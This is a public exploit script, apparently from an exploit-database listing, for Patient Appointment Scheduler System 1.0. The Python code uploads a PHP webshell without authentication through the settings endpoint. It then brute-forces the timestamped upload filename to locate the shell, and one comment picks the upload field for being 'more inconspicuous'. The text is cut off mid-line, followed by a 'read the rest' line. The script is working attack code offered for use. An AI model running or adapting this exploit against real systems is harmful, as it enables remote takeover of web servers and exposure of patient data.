# Exploit Title: Patient Appointment Scheduler System 1.0 - Unauthenticated File Upload & Remote Code Execution (RCE) # Date: 03/09/2021 # Exploit Author: a-rey # Vendor Homepage: https://www.sourcecodester.com/php/14928/patient-appointment-scheduler-system-using-php-free-source-code.html # Software Link: https://www.sourcecodester.com/download-code?nid=14928 # Version: v1.0 # Tested on: Ubuntu 20.04.3 LTS (Focal Fossa) with XAMPP 8.0.10-0 # Exploit Write-Up: https://github.com/a-rey/exploits/blob/main/writeups/Patient_Appointment_Scheduler_System/v1.0/writeup.md #!/usr/bin/env python3 # -*- coding: utf-8 -*- import os import time import logging import requests import argparse BANNER = """ ╔═════════════════════════════════════════════════════════════════════════════════════════════════╗ ║ Patient Appointment Scheduler System v1.0 - Unauthenticated File Upload & Remote Code Execution ║ ╚═════════════════════════════════════════════════════════════════════════════════════════════════╝ by: 33[0m33[1;31m █████╗ ██████╗ ███████╗██╗ ██╗33[0m 33[0m33[1;32m██╔══██╗ ██╔══██╗██╔════╝██║ ██║33[0m 33[0m33[1;33m███████║ ███ ██████╔╝█████╗ ██╗ ██═╝33[0m 33[0m33[1;34m██╔══██║ ██╔══██╗██╔══╝ ██╔╝ 33[0m 33[0m33[1;35m██║ ██║ ██║ ██║███████╗ ██║ 33[0m 33[0m33[1;36m╚═╝ ╚═╝ ╚═╝ ╚═╝╚══════╝ ╚═╝ 33[0m """ def exploit(url:str, file:str, delay:int) -> None: if not os.path.exists(file): logging.error(f'webshell payload "{file}"" does not exist?') return logging.info(f'uploading webshell payload "{os.path.basename(file)}" to {url}/uploads ...') uploadTime = int(time.time()) r = requests.post(url + '/classes/SystemSettings.php', files={'img' : (os.path.basename(file), open(file, 'rb'))}, # NOTE: can also use 'cover' field, but this is more inconspicuous params={'f' : 'update_settings'}, verify=False ) if not r.ok: logging.error('HTTP upload request failed') return logging.info(f'finding new payload file name on target (+/- {delay} seconds) ...') for i in range(uploadTime - delay, uploadTime + delay + 1): r = requests.get(url + f'/uploads/{str(i)}_{os.path.basename(file)}', allow_redirects=False) logging.debug(f'trying {url}/uploads/{str(i)}_{os.path.basename(file)} ...') # NOTE: website will send redirects for all files that do not exist if r.status_code != 302: logging.success(f'webshell payload found on target at {url}/uploads/{str(i)}_{os.path.basename(file)}') return logging.error('failed to find payload on target') logging.warning('maybe need a larger delay or uploads directory is not writable?') return if __name__ == '__main__': # parse arguments parser = argparse.ArgumentParser(formatter_class=argparse.RawDescriptionHelpFormatter, usage=BANNER) parser.add_argument('-u', '--url', help='website URL', type=str, required=True) parser.add_argument('-p', '--payload', help='PHP webshell file to upload', type=str, required=True) parser.add_argument('-d', '--delay', help='delay (seconds) for file timestamp in payload name on target', type=int, required=False, default=60) parser.add_argument('--debug', help='enable debugging output', action='store_true', default=False) args = parser.parse_args() # define logger logging.basicConfig(format='[%(asctime)s][%(leve ..
Support the originator by clicking the read the rest link below.
